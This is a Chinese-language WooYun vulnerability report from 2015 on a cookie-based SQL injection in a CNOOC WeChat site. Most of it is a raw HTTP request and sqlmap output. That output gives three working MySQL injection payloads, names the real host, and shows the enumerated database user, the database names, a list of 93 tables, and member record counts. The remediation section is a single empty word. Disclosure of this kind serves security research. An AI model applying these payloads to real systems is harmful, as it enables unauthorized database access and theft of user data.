当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123665

漏洞标题:中国海洋石油某站cookie存在SQL注射

相关厂商:中国海洋石油总公司

漏洞作者: 路人甲

提交时间:2015-06-30 14:34

修复时间:2015-07-05 14:36

公开时间:2015-07-05 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-07-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注射

详细说明:

GET /mobile/lib/api.php HTTP/1.1
Cookie: BOKADOTCNSITEENGINE=*
X-Requested-With: XMLHttpRequest
Referer: http://weixin.cnooc.com.cn/
Host: weixin.cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

漏洞证明:

---
Parameter: Cookie #1* ((custom) HEADER)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: BOKADOTCNSITEENGINE=' RLIKE (SELECT (CASE WHEN (7907=7907) THEN 0x424f4b41444f54434e53495445454e47494e453d ELSE 0x28 END)) AND 'oflE'='oflE
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: BOKADOTCNSITEENGINE=' AND (SELECT 3414 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(3414=3414,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MdHT'='MdHT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: BOKADOTCNSITEENGINE=' OR SLEEP(5) AND 'gbCK'='gbCK
---
web application technology: PHP 5.4.35, Apache 2.4.12
back-end DBMS: MySQL 5.0
current user: 'qiyeplus@localhost'
available databases [2]:
[*] information_schema
[*] qiyeplus
Database: qiyeplus
[93 tables]
+----------------------+
| boka_account |
| boka_address |
| boka_agency |
| boka_agencyproduct |
| boka_award |
| boka_card |
| boka_channel |
| boka_comments |
| boka_count |
| boka_credits |
| boka_creditsettings |
| boka_deliver |
| boka_department |
| boka_devices |
| boka_dict |
| boka_digs |
| boka_failedlogins |
| boka_fans |
| boka_favorites |
| boka_follow |
| boka_form |
| boka_formanswer |
| boka_formitem |
| boka_formresult |
| boka_forum |
| boka_friends |
| boka_groups |
| boka_hongbao |
| boka_infodict |
| boka_keywords |
| boka_kfaccount |
| boka_kfservices |
| boka_knowledge |
| boka_knowledgeclass |
| boka_logins |
| boka_logs |
| boka_meeting |
| boka_meetinginfo |
| boka_members |
| boka_message |
| boka_modreason |
| boka_mpgroups |
| boka_mpmenu |
| boka_mpmenu_20150615 |
| boka_mpmsg |
| boka_navi |
| boka_news |
| boka_newsclass |
| boka_newscontent |
| boka_openid |
| boka_operator |
| boka_orderlist |
| boka_orderrecord |
| boka_orders |
| boka_pages |
| boka_permission |
| boka_polls |
| boka_posts |
| boka_probation |
| boka_product |
| boka_productclass |
| boka_pushit |
| boka_qrcode |
| boka_qymsg |
| boka_rank |
| boka_rebate |
| boka_recommend |
| boka_recommendclass |
| boka_record |
| boka_search |
| boka_security |
| boka_sense |
| boka_senseclass |
| boka_sessions |
| boka_settings |
| boka_shakearound |
| boka_share |
| boka_shareview |
| boka_shops |
| boka_sign |
| boka_sorts |
| boka_sponsor |
| boka_supplierproduct |
| boka_tasks |
| boka_timeline |
| boka_tplmessage |
| boka_tracks |
| boka_userdict |
| boka_usergroup |
| boka_views |
| boka_website |
| boka_websiteclass |
| boka_words |
+----------------------+
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| boka_credits | 39768 |
| boka_members | 36301 |

修复方案:

修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-05 14:36

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无